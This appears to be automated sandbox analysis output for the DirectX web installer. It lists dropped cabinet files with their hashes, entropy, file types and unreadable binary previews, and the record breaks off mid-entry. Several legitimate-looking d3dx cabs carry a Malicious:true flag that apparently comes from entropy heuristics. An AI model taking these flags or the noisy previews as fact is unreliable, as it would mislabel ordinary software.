                                                                                              MD5:B0669F7D395078BEE0087B089F0B45C5
                                                                                              SHA1:30506FC3DCE9532EF0A8CB3973347EC9C3C9875F
                                                                                              SHA-256:E63A67783EF7624559F95AB697BF8AFBDAB7ACE31200283EF840E6B94AA16E5A
                                                                                              SHA-512:D7EFCFD85B3CB6CB9B1936B701A9D7D91A6094AA08D8C933EDF8493C6AD57BE05A579980A404B35E9721F71B45F4CAE28399FCA3FF5DF20A9A3138B90F86B94C
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....<......D...............!............<...#.............................44f .xinput1_1_x64.cat..F.........4.d .xinput1_1.dll......e.....4.d .infinst.exe.V....l.....4.e .apr2006_xinput_x64.inf......o.....4.e .xinput1_1_x64.inf.. ...9..CK.{.XSI..MHh..AD.. .7t...4..H.TTB...$.."...,...v].{Y{...u..k.......w..pA..}......<.\.9s.w.9sf.x...}...y..L......j`.c2..6..>..L.i.......F.......QZ...X.p.}c.i.`.,^X/l.8...m._..Fv0.}pOO.................N..>....O 6......X..s....A.'.s0....X...c._0.|...?... .....IM.Ln..e..&..$...6?...K.....f7../.A..2...@=..7.`..L&..u:...w.>...q.q'=&...Sf....'..,.S`R,..aJ..@.nO.6.....TEF+.K...4.-.$....<e........ob.^..\({@).F.A.../.'..I../.F>@}..N.f....h...........q\.7#.~...Rm.2...HO0...{...dx....d..00<.3.v..........d....o:.e...,.....I..^v&.t .O..)Y;.B.7|Q.K....Oo...g.L..5.I.....;t.i.\Z.V..>../..G+.!....z5,.*....1.L..#....58..f....7.x..Va~....bY....\+..U.-M.D..H....d"n{..b.X..V...Lqz..k.h.5..I.d)E..x'.hc.dp.Dr.8E,.(.R..+..5.YZS.1.

                                                                                              C:\Windows\msdownld.tmp\AS449FCF.tmp\Aug2006_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40098 bytes, 4 files, at 0x44 +A "xinput1_2_x86.cat" +A "xinput1_2.dll", flags 0x4, ID 6335, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49266
                                                                                              Entropy (8bit):7.9632460736333766
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:OuG396sAA1wXXvVFc2755DkphtVmUkt/lnkvH0odpl/q1nk:vwQsAhFcSmpJ3kt/xcd7ek
                                                                                              MD5:16B968CA0C435EE45E77A84C2D0364A9
                                                                                              SHA1:90B17A60A34F6335787A6B2D489CBCD3A4EA98C8
                                                                                              SHA-256:6DD7C0ABE37D3DF7AA6DB7BB352260F4A15DC965FF9D30AA32FE9595C1A18300
                                                                                              SHA-512:3BBBFDF8B5673641EC066C3FB52E6B0D5CE0BC6ED6BFF17AB4AC3FA69A8628B09E5EC8322FC39D2A206974B54D297CAAFF9410197E26D090FE74F963CD535045
                                                                                              Malicious:false
                                                                                              Preview:MSCF............D................................#.............................4.R .xinput1_2_x86.cat............4.K .xinput1_2.dll............4}R .aug2006_xinput_x86.inf............4}R .xinput1_2_x86.inf.....>..CK.|.\SG..M.. @...mTT.0.(..D..M...+K0 ..D.`...T.Zkk.Am.V..k...V[l...+....*Z4....P..........&w.3g.9..\.Kz<tp..N.;.]Y...%=.!...b.............%v_88.t`qXK.;......B..3..c.8...................a...aA..C..)t...FP.q.%......'.B...("...D0.(..Al(..BY.<..."...s.!...1....&."...a..;6;h.P.#.X...p.H....c..q,..1.'..^.CL..h.C..h.%......f...S.l.'h.p.p.E.......\..G..1..'.)D>.Cd.JB..u.....6..i..A.>...&.......]..J....C..h."........x.......4....0.H.?..P.=.Z"zEaJU...F./...Y.t...~.o.y9<..9.l..7=.9_..d...!.r.F0...4..c2...a.3..y0..B..nD<.K...s!d.9|...p.0|a.U.a.=x.v$.OM.1u{...qQ,..._.R....y..f"...33...@... ......[..1.a.....0.x8..@.N.`i..0...b..c.wYs.L>&..9..A.......UXL.n..8x.....z......W+..... o.'.v.r...$g....R...4.u.r..J.P+......./o:C...Sg.g.&.3r..^.vG.v^...I.s...9..

                                                                                              C:\Windows\msdownld.tmp\AS44A55D.tmp\Aug2006_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81182 bytes, 5 files, at 0x44 +A "xinput1_2_x64.cat" +A "xinput1_2.dll", flags 0x4, ID 7454, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90350
                                                                                              Entropy (8bit):7.985841057262195
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:5lQFOMW9t2gGQtmxC4LbB8GXjgvW/j44krD+W2MLdk6v5yO1Ha6DB/4RPjz6ITda:rIOMWm+tmnbXjVkWW1lgO166cjz6z
                                                                                              MD5:A9D582E44E46E36F37EDB7CBC761179D
                                                                                              SHA1:ED1BEF64385E94CE89AFA704D38408E23B31FA79
                                                                                              SHA-256:C26633D38E0A91B9BE70382E916A83D50E219609F7E05CFB2D27DFAFBE480B43
                                                                                              SHA-512:20011BFB547DEDCE8E6FCEDA22C3A3A83DB140E8A20844F3B0E8741B4474C1FEA73D84708B801E83EAE3CD2D8A2D6C851C3F7CD0154C0382A78BC2C2DF6B01E5
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....=......D............................=...#.............................4.R .xinput1_2_x64.cat..G.........4.K .xinput1_2.dll......f.....4.K .infinst.exe.V...'m.....4}R .aug2006_xinput_x64.inf.....}p.....4}R .xinput1_2_x64.inf....%p9..CK.[.\SI.....I..1`D...]A......A....D .)4........E]...`.....^VV.........{.\.]......~./w.9s...9sf.E..k.....l@...Y....*...Cu4.....t......I.Q.<u)ey...k1...K0.)....u..+..{..&...Z....@=].X....'..$q*D...y.kZ.+..O..x .....F.@..........A.wd..........;......<@i.. ..s(G..J..".q.#..c.u...=.H<"A.H..C..;.>....43V.4..1y.;..j.yK"F}.F..#.RY.h.u.2.....p.C...u...b.:..E1.?f........H@]..;..DfR.T.%..-.....h....@...;...Z=@..pGb.b... .........n.....b>...R~...J...X...0.?..P7..........p6."/=.Z mI.r..X..x...ey...m#.>Pi.ZY.".....Xi..B..S.....7....=P7k}L..."bB.....;.....)...;..L...`B.PG.8.d..q....e.E*....D.T.$..H..X.A..,6..y.|..4..*.x...K.....o...6`mB.T+.B..0..[..Q4MS.D?.9j.+...<..'.0.9"...5.l-S...8.#H..XF..puM5#.8.R..7..2.L.p..'....\../.....a....

                                                                                              C:\Windows\msdownld.tmp\AS44AABC.tmp\Dec2006_d3dx10_00_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 185760 bytes, 4 files, at 0x44 +A "d3dx10_00_x86.cat" +A "d3dx10.dll", flags 0x4, ID 5461, number 1, extra bytes 20 in head, 14 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):194952
                                                                                              Entropy (8bit):7.9966042762544145
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:x4mJ4SadBGg8IZrdosr2nqOwY7l43gRDlcGgp6VMslgVwxikcBmEi21wx8MqX+dN:xJJ4VWgzZptAqOf6wRD5g0VlgVwxL21I
                                                                                              MD5:75C33157D8A1B123D01B2EAC91573C98
                                                                                              SHA1:E3E65896CE0520413979C0143C3AA9BD3A6A27D3
                                                                                              SHA-256:02DAA8B5AC3752F76C3BFD9A505EBF22B1B4B41E44EB92CE2799033B2330D186
                                                                                              SHA-512:F0F1F1DEA5938E1C7FF2ADF7C8D421C2E68E6D3A8CDF18D0F2F3FE1C6837A4F37B367D2D974C35832D1D85A619948DD0F250C7D6DC4AE39F618F5A2893EAC7DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............U................#.............................5.a .d3dx10_00_x86.cat...........}5.h .d3dx10.dll............5.` .d3dx10_00_x86.inf............5.` .dec2006_d3dx10_00_x86.inf....9.>..CK..\.K...C..DEA.P.$.......$...%.A.....0 F.Y.s.1#...#..f.......y...}....ZU..jU......SP.=.gB..GQ....>.5.p8.*<%.y3uY.....Xv.....G.S..)/...A.x....@U.GN.....{,.0nI..@.......d.......R..S....s..B.........B...H. ;.. 9..<...nL.5..!..4=.>.o....A..u.i^...dd..x!.....p...@Jn.;H.L...d......&$. ..|<&/;.O...!.A..%##C.RZ...YG....Z.h..ee........+..D...D&.F.....?.a...Io..hg.5..blP..I.......B....`..,.....u..=A...<.%!.8.,.0....b...v.O..a....#.._J....3o.........F..Z {".t\..H..eo..1h.m.0.a....1....Bc..s.^..V..Bq.x...D(.E....@...&......<._..xv......OB....6L......y.. ....$3.....AB.&.cC8C".p.9.,[..mZ...C+....J.....A.04...rY.....7.y..!^....>j.+yj-#.#...h23.e..)....f....k.:@.-..3...,...O..Vl..#....MIK.Yk@j...^!,96O".....T...\.H,IIL....dfXw.u..e.w.F...C...Y).I\....&.[.4.

                                                                                              C:\Windows\msdownld.tmp\AS44B115.tmp\Dec2006_d3dx10_00_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 206847 bytes, 5 files, at 0x44 +A "d3dx10_00_x64.cat" +A "d3dx10.dll", flags 0x4, ID 6580, number 1, extra bytes 20 in head, 17 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):216015
                                                                                              Entropy (8bit):7.996946294916653
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:SGo145qtWQt9fL4bBHlKqDfaqaGm3+vqm9/Xx0b6POnzED/RIxeqTk0T:SGo145qtbt1LaeB36/xc6PkV
                                                                                              MD5:681407075E9B19E5EF2218832F6FAD71
                                                                                              SHA1:E4F4D292A36CD9A3034007EF9D2005694307EB52
                                                                                              SHA-256:F9BD5BB083BD55D1D2A690BC66D6D9DA0B1A8B49F09E811E788C030669121118
                                                                                              SHA-512:E983E7DD3F40510816FF3AE836600A186DBA827B484B0C346C20E43E229189A86D4CB5CF219C1FC35B77AB0668866446F6E9206B279931C927D4ED66AD3625F1
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....'......D............................'...#.............................5#a .d3dx10_00_x64.cat..)........}5.h .d3dx10.dll......H.....5T_ .infinst.exe......O.....5.` .d3dx10_00_x64.inf......Q.....5.` .dec2006_d3dx10_00_x64.inf......:..[.... .Vm.....%A.P...?..,..".._.R.&.F.J.J.K.^.^.*..".U.!. ...BvJ...G......(.........C~.b...V...i.Z..O.<.%. .*C...@l....a........XBq..Q.]g..2;..+d.[T[.Q..(ji..*J...........T%.E.5.o3w.;.x.p.+@...JH...JA%*.`.F..^....z..B......D.....*S. \.3....."A%'n..h.f%.E.Ue.T..61....i.....m.X.......Wu...pf.a...............G.B...........$..%....R...`K.x....U,/...aH........S..^..2....h.E.6....B.K.A..........4!@7..........2...].}...".2..Z...!V.......-.6..<...{}......*........o.~.ST.}.O.H.,....U.N.;..g{j.~a...^..7.n#.......SJ....~3}I9.\s.o....u.c;.../...RT....O~.R......L>C....W...K....P..z..........f%........::...vr.hC.Z.5...75+^...........evQ...8....v..)...W{..O/..<$....t...;. t..,&F.]&@.R..3e._.KZ.....C|../...^.p&..`\SVd.......ge..E.

                                                                                              C:\Windows\msdownld.tmp\AS44B6F1.tmp\Apr2007_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 47342 bytes, 5 files, at 0x44 +A "xinput1_3_x86.cat" +A "xinput1_3.dll", flags 0x4, ID 8235, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):56510
                                                                                              Entropy (8bit):7.973777529821975
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:BcnwcwzHEdb27WH2SfZDNu75ddnVR+ZFaNk0ZKn4:4wb+2eZonQwt
                                                                                              MD5:B362EC93463D8B6381A864D35D38C512
                                                                                              SHA1:7CE47EBCEDA117D8B9748B5B2D3A6AE99FC239DF
                                                                                              SHA-256:B6C1166C57D91AFEEEAA745238D0D6465FF2084F0606FD29FAF1BFA9E008A6C5
                                                                                              SHA-512:CC57733912E2A296A11CD078372C3B43F1256A93EC5BECD0D1B520EB210FCE60938AA1CAA6DBBCA03292A05495B5ECD212EE5F77E3EBABB11EF31F1975B2D09E
                                                                                              Malicious:false
                                                                                              Preview:MSCF...........D...............+ ..............#...................(.........6{. .xinput1_3_x86.cat.h?...(.....6.. .xinput1_3.dll......h.....6G. .apr2007_xinput_x86.inf......m.....6G. .xinput1_3_x86.inf./....p.....6G. .xinput1_3_x86_xp.inf.i...T5..CK.y<.....Y.d..H.<3.1....=...`,cbB.f...*R*kB..V..E...,.[$I.R(~g..n........}....<....y>.9.s.....f*&.s)E.F..Cp ..Q...D 0<0.;....R.....3.\...4...F.1QI...........@..O....2.f....I\...a...c4.0.....,...0.!..6.. M...@..:..ocp.A.K6......... .F..!...[....+..,...0n...<..@cl`+Xe^.X.t.$.;{X@.P....@d..N=.....Z..g....&...#...%]....~.........C. #..u...h(.4^.4.... a.a...*#.Z<....%.{..5..n$....P@[..C<01..Y...F.\..[.H.H.l..f.l.X.0...l.4.A....+B.~.|.l.YO0..k}i>~V..O.f...M0n^.?..B..........a.......N.w/==J.{..D@0..Q.....%..@6..Z.|......@@.4..a.....q......t....4v....dI.Ym..^...........[7.XH.8Y.nR..d.<.;O.."k...d.y2aV..4....D...5..B".H~.....+x_o.4....c.#.`..0...v.F4........I.Q$.....x....._..;]...O[....l....?..:.......Q._....2.;.~...NXz

                                                                                              C:\Windows\msdownld.tmp\AS44BC31.tmp\Apr2007_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 90857 bytes, 6 files, at 0x44 +A "xinput1_3_x64.cat" +A "xinput1_3.dll", flags 0x4, ID 9350, number 1, extra bytes 20 in head, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100025
                                                                                              Entropy (8bit):7.988437274786544
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:Mt5OSvuXSf2rbZu4Kmsr4eLRwPC5B9y7q:MTOBXSSpFI4/PM/ye
                                                                                              MD5:FAE84E0773A74F367124C6D871516B7B
                                                                                              SHA1:CAF8B9D7D4AF965BF445D052D1E835B680D6BBC3
                                                                                              SHA-256:86EE073C199B5080FE4F5BE6AC24BB1117FEA42E4BBCD828B4F0EC26C669B22C
                                                                                              SHA-512:CAF1381CAE7417B57FAEF56D0023BF90C90406748F8813AB85C687DDB81E2498D2F1D5F4BC154903FD5A19836E6F245CD6F5D3927A383F1ACC3BCC41B58FD09B
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....b......D................$...........b...#...................(.........6+. .xinput1_3_x64.cat.h....(.....6. .xinput1_3.dll.h..........6.. .infinst.exe.\...h......6H. .apr2007_xinput_x64.inf............6G. .xinput1_3_x64.inf.....a......6H. .xinput1_3_x64_xp.inf...<.6..CK.\.\S.?....H3`@....B.....t.....D!.! " ].{..`AW........b.k/(....fNN ..z.}...g..of.7...|3#.]4.j...."V.;u.".,..t.....*.. o.!G4.G.<........!.I.P.'..t-B..T.N5...U.......2..S.....:....Ju.S.Q..v"D%..y.KR..B...a (.4.....7......x!L.\..u@.@...B.-G0......A..g...Dj8.j..L.X.."0."...^...kP.&@.}.....PP..k.p..|.`..P..D"... .H.1.h.^.G...#...+Ls..7..!qH."@..."..;,....Iz;u.t....>..Ki.y.~.5M`)SR(..$....&P:........-F...@....-..C.&V....N...Z..!....~.....{X"eo.5.D6.u...Y.9...8.......pg8....g....4....j@.S..T..C.H..7..ID...!.HP}.....7U..@?1".yMi....aA.....[..&.M.0A..'L,.q. 6`..DZ...i2.t..(Sw...e..X..6 ..y$...>....D.&R......>....~..U.Z...X.B.5:HAn.IU..[ .*.MH...8..Tgg'.H.G$H.$........)a...E b.y.>........t.....dF.

                                                                                              C:\Windows\msdownld.tmp\AS44C633.tmp\Feb2005_d3dx9_24_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1007265 bytes, 4 files, at 0x44 +A "d3dx9_24_x86.cat" +A "d3dx9_24.dll", flags 0x4, ID 4987, number 1, extra bytes 20 in head, 69 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1016433
                                                                                              Entropy (8bit):7.998972724711677
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:T/HUK+hlSM4jwe8WpmQUrxiUyULWoF/V++TYrjVdLa1:bHURewe8W4VN8uF/VhMr5s1
                                                                                              MD5:7029866BA46EC477449510BEEE74F473
                                                                                              SHA1:D2F2C21EAB1C277C930A0D2839903ECC55A9B3E8
                                                                                              SHA-256:3D4E48874BDDCD739CF79BF2B3FD195D7C3E861F738DC2EAB19F347545F83068
                                                                                              SHA-512:B8D709775C8D7CA246D0E52FF33017EE9A718B6C97C008181CD0C43DB7E60023D30D2F99A4930EBA124AF2F80452CBF27836D5B87E2968FB0F594ECA1EBF78DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....^......D...............{............^...#..............E...7.........E2.. .d3dx9_24_x86.cat...!.7.....E2.. .d3dx9_24.dll......."...92.. .d3dx9_24_w9x.inf......."...92.. .d3dx9_24_x86.inf.(~m.?..CK..\.Y..O..........H.$@..(M..X.. R.I...6...#.^.......{w..}&............{.3..gf.e.....0*`..kFm.......i.`p....X..Y-..7]n^..9...e.(.7..^..V.FO+...v.,e.^..l(i~w...M...l...s...z..U.7.c5.b.3..........#1.I.'.F2.C.@.......'Hx /..K.~.`g.).0..".8y....0.8...N.|..v.u@...P...H.R......c;W....yg..x....s...2..\...}..%21.D..... ...q.....E,.....q.Ee..$...66...pGr}.. +..!&&&PK..f.r...x.'..<.. ....kH..@....~l....\....@fD...+y..:UC.%...zy1.........~j..v..{%..v[S.ZEE...5....i;..1.(...&.x._.......R+[A..l..z(.e. .k..jbf.@.336T.[...'...J/-..uHc.u.....6..U.....).l...&.".9.X..H\.N...d.V.g...^...Jv..PQ~#?....V.......j:..p.....k.R.......0o.~..F..70.).4b7......+.:.&.)Qd(9...i....J35q.....T%..b._....,..........)Qjt.DU.B.R.s..-.`.......4HE...JObJDlG.4x......lb..<..C..sHD.

                                                                                              C:\Windows\msdownld.tmp\AS44CEBF.tmp\Apr2005_d3dx9_25_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073002 bytes, 5 files, at 0x44 +A "d3dx9_25_x86.cat" +A "d3dx9_25.dll", flags 0x4, ID 6922, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082170
                                                                                              Entropy (8bit):7.999075135168916
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:i0BodqhH/OCy8M+j5lcB4ZfeXBXUd/QLML9bw6Uzc12:iUbffy/+lmBXF8Ioxw6Uo12
                                                                                              MD5:9C5DCA423D9D68349D290DF291DDBEEF
                                                                                              SHA1:D9F1CAE586470EA309CE9F115525B0504FFFAEA4
                                                                                              SHA-256:5487ED4E969A822E5C481CEFB1D4DA3066B1D5EC8C55798B246915ECB58A8665
                                                                                              SHA-512:9F50599321F45FB7451B0A1C0F1DCBD6B4A4E60EE27B0EF5AA29168C1BCE5B08F34329916EA2EA655CD632D0A19C81953C2A5F1277F6A96FB63AFC098236509D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....j_......D...........................j_...#..............H...7.........r2. .d3dx9_25_x86.cat..#.7.....r2}. .d3dx9_25.dll.......#...r2,. .apr2005_d3dx9_25_x86.inf.......#...r2,. .d3dx9_25_w9x.inf.....k.#...r2,. .d3dx9_25_x86.inf.(.0.?..CK..\....'4.A..".+.@.%..C*.4).b!@..$.....a..k.#..v.w.w.]xg...............9{......k....q....6.Z&Ey-.@.....a.0.T...9b......a...b....ilk.+c.5.af.o.vl..............<....s.z..V.7........fa\.G\$En..._..|$.?9.O...!..H.<...#.,...!.^N.<.g"..=.V|O.a..gwcw...t.c.......X..4(.).. .?.S..0k..._2{<%X.......m.*....D&&..v.c ....Av...u.l. K2......R.0.&.XO8b..p."H@^..2..jbb...hg.&...>.>....u..x....2...@.~....9..u.a.M.X...S5d_..|}z"h..1.....<...Z!...V).............}OO...n.2..Q....../.......R+[C..l..(...@......1........$..vs..K. m...e...b..\}u.+.....?..bg...P.......%.pRgTq.t.t.e<..t.Y._.X.?F.(../.......abb.G5.qkb.\..Z...g.....g..(.....f..Lz.8...h.e....t.R.fJ.iJNCv}:.V.:..m.B..JIQrlA..Z5..HR..)9-...:.......V.JP.)t*.....6m....

                                                                                              C:\Windows\msdownld.tmp\AS44D7E6.tmp\Jun2005_d3dx9_26_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1058965 bytes, 5 files, at 0x44 +A "d3dx9_26_x86.cat" +A "d3dx9_26.dll", flags 0x4, ID 6937, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1068133
                                                                                              Entropy (8bit):7.999040217820951
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NxFMsUF1MmwONoWu85w6SFBu+vveJ0sut3z2A1s9z/D8gigA:V3dm3NoW+9FBhuJ9ut36A1s9z78giP
                                                                                              MD5:029359EBCA4BA5945282E0C021B26102
                                                                                              SHA1:6107919F51E1B952CA600F832A6F86CBBED064B5
                                                                                              SHA-256:C44EABF5BE3B87CD845950670C27F6A1E5D92B7758BA7C39C7849B1EE1C649C0
                                                                                              SHA-512:FA007F257F5267119B247EC4ED368E51FD73E6AEA3097E2FC4E78078C063AF34D161FD1BDCAF3097BB575D2614DBA226A624D060009EE4F7BEDA697EFCF42BB7
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....(......D............................(...#..............G...7..........2b} .d3dx9_26_x86.cat...#.7......2Z| .d3dx9_26.dll......,#....2.} .d3dx9_26_w9x.inf......-#....2.} .d3dx9_26_x86.inf......0#....2.} .jun2005_d3dx9_26_x86.inf...N..>..CK..X....'.. ..P.....&!. .%.A........`.....;v..WTd..........w......{.{..<'...3..;}....=Xv3.e.vc:.yg.i.....1.....V.F.:.fMj ,.|.e.....F..5#?.|6.M.j[Z..k3.....g.f.B(..=v......a<.7..a.=.:...h.f.X6.."..I..I......Od:.!9......~1.H..q.....'....y..\...E..u.S|K.a...:c..B..8g:!?._..E:.A.H...N.a..j..~pI.....V.k.l.W.....X..........`4.2(.....e.>...0...!L..>p.....2d..r<...afffPK.6..t0.V.'HA.....j.o...5B+. .....hy...... M..5t...K.<>..@.G........~h..Xw.B.....F~>.?l..7..].}Xp.m.!......x~6.aY_*.rmH..sr.."Q*..]..d3.{.bXX`P....io...AZ.i..$..1....Gl.....d..AM:6.......p./(..Q.1..1..q....O.c~.c........04...|s3...}..x..I.r..).m.K1.o#.Q.Fa...X7.baY......G{......Z5S.HU..c.tp.z6.4m.B=P...d.6...g.....W..aM...z...L.R.W%...z.F.n.5....54EG.R

                                                                                              C:\Windows\msdownld.tmp\AS44E014.tmp\Aug2005_d3dx9_27_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1071684 bytes, 5 files, at 0x44 +A "d3dx9_27_x86.cat" +A "d3dx9_27.dll", flags 0x4, ID 6926, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1080852
                                                                                              Entropy (8bit):7.999138982152864
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:sP2N00PXWcq4UsDMMlsOgDUaQFMBZ0To2xIG:sP2CuZQsVl96fQiZMo2xz
                                                                                              MD5:3E91448A7481A78318DCE123790EE31A
                                                                                              SHA1:AE5FE894790624BAD3E59234577E5CB009196FDF
                                                                                              SHA-256:8C062B22DC2814D4F426827B4BF8CFD95989FD986FB3AAA23438A485EE748D6D
                                                                                              SHA-512:F8318BD7CA4271FC328D19428E4688DA898B6D7FB56CC185AD661D4A18C8169392C63515D7DD2D0B65CBD1F23892D7A0A5D3D77A4CDA6230BA03B3B917E5C39A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....DZ......D...........................DZ...#..............H...<..........2.. .d3dx9_27_x86.cat..d#.<......2b. .d3dx9_27.dll.......#....2.. .aug2005_d3dx9_27_x86.inf.......#....2.. .d3dx9_27_w9x.inf.....p.#....2.. .d3dx9_27_x86.inf.]Z...>..CK..X.[...C.)...1(v.).. 3."J.P.. @(.&.Y..v...].....{.cW.$("..w.....yN<?v.5k.......q.Y..0......Z&.9N.!.....f.0.X...9b......fF......iL..+c...ff.tx.f....no.II...2.LO6..arY...u*..PZM..9.6f..H.<...._..G".K.1...R.I..|......=!....\O}<[/E.#..>.......+...........v!..C..:..Q.$.....s....LD.Q.i....h....b*..aB3c.a.b.W..c.151/,./r.rD>...(.i..%!.......\.......Sn.|t.[{F..Mq..\..5.d......J....J.3&....jN../S_N...Qg...gA..3..:...T.0f7.k..&.a.{o.+.j....:..j.f.s..54..`.}..g......?h....bf...w.(......C)(...$.........gJ~..`.;..P>...e.......c.C..@K...d0.@M0(.YM$.y..78..U.Y...J........W......A.04)...&4..{?....Ce..W.;..0m..x.9......n....Io!.!.>...o.......],OQ..0.Q..[KR5QrU.2)I...m.kU."<^..S..3.Q.....".b.F..UF.uJ....:lZ...p.2.R.

                                                                                              C:\Windows\msdownld.tmp\AS44E851.tmp\Dec2005_d3dx9_28_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073496 bytes, 5 files, at 0x44 +A "d3dx9_28_x86.cat" +A "d3dx9_28.dll", flags 0x4, ID 6914, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082664
                                                                                              Entropy (8bit):7.999121865147412
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Wa0lNxqf7fg42FhNffA/Lj41q7+YeSFfSKidHVmTJwagz8u:WHXx652fNffm0oleSt3Fwa3u
                                                                                              MD5:B1CCAAFF46FE022439F7DE5EB9EC226F
                                                                                              SHA1:8BB7225DF13E6B449D318E2649AEB45A5F24DAF7
                                                                                              SHA-256:645F8D90B07C69330A8C7C8912D70538411C9A6B2813048DA8AD3C3119487F93
                                                                                              SHA-512:2B59C07584D45705273A975A0223E4443DB190675558AB89D92E1572DE4843BE3D0D1267818B19185E4E438A8BCFA2AF5FB5EF2A119DA270BE4540576FD78C77
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Xa......D...........................Xa...#..............H..............3g. .d3dx9_28_x86.cat..t#........3). .d3dx9_28.dll......#....38. .d3dx9_28_w9x.inf.....x.#....38. .d3dx9_28_x86.inf.......#....38. .dec2005_d3dx9_28_x86.inf...a.>..CK..X.[...C.)...1X..S.I...(M@A.......Pm..;......,.`...=.#v.$("..w.{...yN<?..=k.^..=s...o.jw..et.=..YA..=H.eF..l...,;.17kj....+.jw..Y.ry6..\.Y.4.igecJ...,.g.yp.F.yc.....X...e...L6.....SI..j......."6."...2.... ..+..O$B,..6l. ..B1l.`.....A..rN2..ggf..g..... ..H..Dp$.1..h..X.O..Pi...[LC.L..!d.\....fff................lknfYP@_..|...Q4.!.JBJ..0...Ri[4.=..r<...b.3M/F].._S.J.."......"...P%@...`..l..J.*/.!.3.M.....y.l...TI.d*~8.0fwf.J)M.C.U....<n7......./..&..P.R0...Q.JU..2.`...2.ri....vp:.Lg.:(.....7.H2.p.!....N.).A...bg......$..6.M5Nj.e.U..-9..P..L.5...G5.......A.P.6..6..v.i..6..6........-....`.........&3nN..K.&w.g-c....4K.9..}...U}.."VCf}*b]..B..+.j.D..d5`..k...j...4UR..... ..Ux."].d5g6..l.70&.%J.^...Q.U.5...9..~

                                                                                              C:\Windows\msdownld.tmp\AS44F0FC.tmp\Feb2006_d3dx9_29_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1078760 bytes, 5 files, at 0x44 +A "d3dx9_29_x86.cat" +A "d3dx9_29.dll", flags 0x4, ID 6921, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1087928
                                                                                              Entropy (8bit):7.99922866964108
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWlF24ngnZPhX4ciAwvVHgK6SgHY6OmSfLV+:MWls4gnZTmHx6SgnPCY
                                                                                              MD5:F6CC1C08D0F569B5F59108D39CE3508B
                                                                                              SHA1:E9CF7EDC8C9C4B57A9BADD8386A2117EC5785AAB
                                                                                              SHA-256:4114E76799AF3DA9DB3DAE51305DAD70A05B757E506E4A327092D536CCA7EE75
